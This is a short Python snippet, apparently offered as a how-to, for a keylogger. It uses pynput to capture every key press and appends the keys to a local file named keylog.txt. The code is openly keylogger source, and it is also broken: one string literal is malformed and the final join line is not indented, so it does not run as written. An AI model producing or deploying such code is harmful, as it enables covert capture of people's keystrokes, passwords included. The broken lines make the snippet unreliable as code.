```
from pynput.keyboard import Listener
```

```
# Specify the log file path
log_file = "keylog.txt"
def write_to_file(key):
  key = str(key).replace(""", "")
  with open(log_file, "a") as file:
    # Format and write key presses, handling special keys
    if key == "Key.space":
      file.write(" ")
    elif key == "Key.enter":
      file.write("\n")
    elif "Key" in key:
       # Ignore other special keys like shift, ctrl, etc.
       pass
    else:
       file.write(key)
# Listener to capture key events
with Listener(on_press=write_to_file) as listener:
listener.join()
```